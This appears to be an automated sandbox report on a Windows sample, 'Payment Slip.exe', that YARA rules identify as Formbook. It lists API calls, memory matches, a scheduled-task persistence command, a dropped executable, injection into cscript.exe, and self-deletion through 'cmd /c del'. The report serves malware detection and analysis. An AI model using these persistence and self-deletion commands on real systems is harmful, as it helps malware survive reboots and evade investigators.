            Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF67D8
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF67C8
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF5CC8
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00197447
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 4_2_00357447
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00401030
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041C147
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041BBF1
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041CB81
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00408C70
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00402D87
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00402D90
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00402FB0
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00D07447
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514F900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05140D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05164120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05211D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515B090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517EBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05166E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0111C147
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0111CB81
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0111BBF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_01102D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_01102D87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_01108C70
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_01102FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0514B150 appears 32 times
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_004185B0 NtCreateFile,
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00418660 NtReadFile,
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_004186E0 NtClose,
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00418790 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_004185AC NtCreateFile,
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041865A NtReadFile,
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_004186DA NtClose,
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041870A NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051899A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051895D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051896D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051896E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0518AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051899D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051895F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0518B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051898A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051898F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0518A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0518A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0518A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051897A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05189A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_011185B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_01118790 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_01118660 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_011186E0 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_011185AC NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0111870A NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0111865A NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_011186DA NtClose,
            Source: Payment Slip.exe, 00000000.00000000.668340749.0000000000246000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTypeNameNati.exe4 vs Payment Slip.exe
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs Payment Slip.exe
            Source: Payment Slip.exe, 00000000.00000002.713221501.0000000006BA0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs Payment Slip.exe
            Source: Payment Slip.exe, 00000004.00000002.706578283.0000000000406000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTypeNameNati.exe4 vs Payment Slip.exe
            Source: Payment Slip.exe, 00000005.00000002.785702615.00000000018A0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Payment Slip.exe
            Source: Payment Slip.exe, 00000005.00000002.786961338.0000000001C0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Slip.exe
            Source: Payment Slip.exe, 00000005.00000000.706865213.0000000000DB6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTypeNameNati.exe4 vs Payment Slip.exe
            Source: Payment Slip.exeBinary or memory string: OriginalFilenameTypeNameNati.exe4 vs Payment Slip.exe
            Source: Payment Slip.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: uVxomBuy.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Payment Slip.exeFile read: C:\Users\user\Desktop\Payment Slip.exeJump to behavior
            Source: Payment Slip.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Payment Slip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Payment Slip.exe 'C:\Users\user\Desktop\Payment Slip.exe'
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\uVxomBuy' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F38.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Users\user\Desktop\Payment Slip.exe C:\Users\user\Desktop\Payment Slip.exe
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Users\user\Desktop\Payment Slip.exe C:\Users\user\Desktop\Payment Slip.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Slip.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\uVxomBuy' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F38.tmp'
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Users\user\Desktop\Payment Slip.exe C:\Users\user\Desktop\Payment Slip.exe
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Users\user\Desktop\Payment Slip.exe C:\Users\user\Desktop\Payment Slip.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Slip.exe'
            Source: C:\Users\user\Desktop\Payment Slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Payment Slip.exeFile created: C:\Users\user\AppData\Roaming\uVxomBuy.exeJump to behavior
            Source: C:\Users\user\Desktop\Payment Slip.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4F38.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@12/4@6/5
            Source: C:\Users\user\Desktop\Payment Slip.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Payment Slip.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Payment Slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Payment Slip.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Payment Slip.exe, 00000005.00000002.785702615.00000000018A0000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Payment Slip.exe, 00000005.00000002.785791059.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000D.00000002.934852520.0000000005120000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Payment Slip.exe, 00000005.00000002.785791059.0000000001960000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: Payment Slip.exe, 00000005.00000002.785702615.00000000018A0000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Payment Slip.exe, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.Payment Slip.exe.190000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.Payment Slip.exe.190000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.Payment Slip.exe.350000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.Payment Slip.exe.350000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4EFB push ds; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4E7F push cs; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4FDB push cs; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4FAD push cs; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4F61 push es; retf
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4F7F push es; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4F3B push cs; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4F31 push es; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4C9F push ss; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4CAB push 0000001Ch; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4C5B push ss; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4DCB push es; retf
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF2DDE push edx; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4DF1 push ss; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4D87 push ds; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4D0F push es; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF4D37 push es; ret
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF521B push es; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF5083 push es; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF504F push dword ptr [eax]; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF5067 push ds; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF0007 push es; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF51A3 push cs; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF5117 push es; retf
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_06CF5123 push es; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041B85C push eax; ret
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_004160D6 push ss; iretd
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00415D5A pushfd ; ret
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041A678 push ecx; ret
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041B7F2 push eax; ret
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_0041B7FB push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 6.9991644311
            Source: initial sampleStatic PE information: section name: .text entropy: 6.9991644311
            Source: C:\Users\user\Desktop\Payment Slip.exeFile created: C:\Users\user\AppData\Roaming\uVxomBuy.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\uVxomBuy' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F38.tmp'

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\Payment Slip.exe'
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\Payment Slip.exe'
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.Payment Slip.exe.2658590.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmp, type: MEMORY
